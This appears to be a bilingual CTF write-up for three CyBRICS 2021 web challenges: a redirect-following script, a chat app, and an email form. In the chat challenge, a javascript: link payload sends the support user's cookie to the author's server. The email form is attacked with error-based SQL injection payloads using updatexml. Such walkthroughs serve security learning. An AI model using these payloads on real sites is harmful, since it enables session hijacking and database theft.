[toc]

Ad Network

image-20210724190509416

题目要求我们不断跟进重定向跳转 1337 次

进入题目:

Enter the topic:

image-20210724190445950

查看源码发现一个接口 /adnetwork

Look at the source code and find a /adnetwork:

image-20210724190812225

访问该接口并抓包发现是不断的重定向:

Visit the /adnetwork and capture packets and find that it is a constant redirection:

image-20210724190644260

image-20210724190725167

写个脚本不断跟进每一次跳转,跳转 1337 次即可得到 flag:

Write a script to continuously follow up every jump, jump 1337 times to get the flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
import requests
url = "http://adnetwork-cybrics2021.ctf.su/adnetwork"
r = requests.get(url=url,allow_redirects=False)
redirect_url = "http://how.adnetwork-cybrics2021.ctf.su/win-discover-college-responsibility/important-fine-laugh-project-movie/race-about-hit-first"
for i in range(1338):
r = requests.get(url=redirect_url, allow_redirects=False)
try:
redirect_url = r.headers['Location']
except:
r = requests.get(url=redirect_url, allow_redirects=False)
print(r.text)

# cybrics{f0lL0w_RUl3Z_F0ll0W_r3d1r3C7z}

Multichat

image-20210724210505996

题目是一个聊天室,内置两个用户,一个是 Admin 一个是 Tech Support,只有 Tech Support 可以向 Admin 发送消息来要取 flag。

进入题目是一个 WebSocket 实现的聊天框室:

Enter the chat box room with the subject of a WebSocket implementation:

image-20210724210552919

输入房间号并进行连接后可以发送消息,但是没有人回你,因为你没有进入正确的房间号。此外在右上角电话处可以向提交工单,在 URL 处提交链接后 Tech Support 会对访问进行查看。我们可以使用 javascript: 伪协议解析 JavaScript:

After entering the room number and connecting, you can send a message, but no one returns to you because you did not enter the correct room number. In addition, you can submit a work order to the phone at the upper right corner, and Tech Support will check the access after submitting the link at the URL. We can use the javascript: pseudo-protocol to parse JavaScript:

1
javascript:fetch('http://47.xxx.xxx.72:2333', {method: 'POST', mode: 'no-cors', body: document.cookie});

image-20210724210237539

提交后,当 Tech Support 查看我们提交的内容时,JavaScript 便会执行并获取其 cookie 并发送到我们的 VPS 上:

After submission, when Tech Support views our submitted content, JavaScript will execute and retrieve its cookie and send it to our VPS:

image-20210724210313120

Cookie 就是房间号,连接该房间并伪装 Tech Support 向 admin 发送消息要 flag 就行了:

Cookie is the room number. Just connect to the room and pretend to be Tech Support to send a message to admin with a flag:

image-20210724210356479

Announcement

image-20210724211228590

没啥可说的……

进入题目,可以提交你的邮箱:

Enter the page, you can submit your email:

image-20210724211258238

随便输入一个邮箱并抓包:

Just enter a mailbox and capture the package:

image-20210724213933345

digest 是 email 内容的 md5 值,猜测在 email 处存在注入:

digest is the md5 value of the email content. It is guessed that there is injection at the email:

image-20210724213908947

发现 MySQL 报错,根据报错内容可以猜到后端的 Sql 语句:

It was found that MySQL reported an error. According to the content of the error, the back-end Sql statement can be guessed:

1
insert into users (email, timestamp) values ('$email', NOW());

直接尝试报错注入:

Try to report error based injection directly:

1
123' or updatexml(1,concat(0x7e,(select log from logs),0x7e),1),'1')#@qq.com

image-20210724215024654

又报错了:

Error again:

1
Something went wrong during database insert: Incorrect datetime value: '1' for column 'timestamp' at row 1

看来我们提交的 payload 中,timestamp 字段位置的值不符合要求,但我们就在本地随便生成一个 NOW() 的值进行注入:

It seems that in the payload we submitted, the value of the timestamp field position does not meet the requirements, but we randomly generate a value of NOW() locally for injection:

image-20210724230351845

再次构造 payload:

Construct the payload again:

1
123' or updatexml(1,concat(0x7e,(select log from logs),0x7e),1),'2021-07-24 21:40:39')#@qq.com

如下图所示注入成功但是没有回显:

As shown in the figure below, the injection is successful but there is no response:

image-20210724214633084

我不知道怎么回事,可能当前注入点不能回显。将注入点换为 timestamp 字段后成功了:

I don’t know what’s going on, maybe the current injection point cannot be echoed. I changed the injection point to the timestamp field and it succeeded:

1
123',updatexml(1,concat(0x7e,(select log from logs),0x7e),1))#@qq.com

image-20210724214746455

Checkin

image-20210724221200806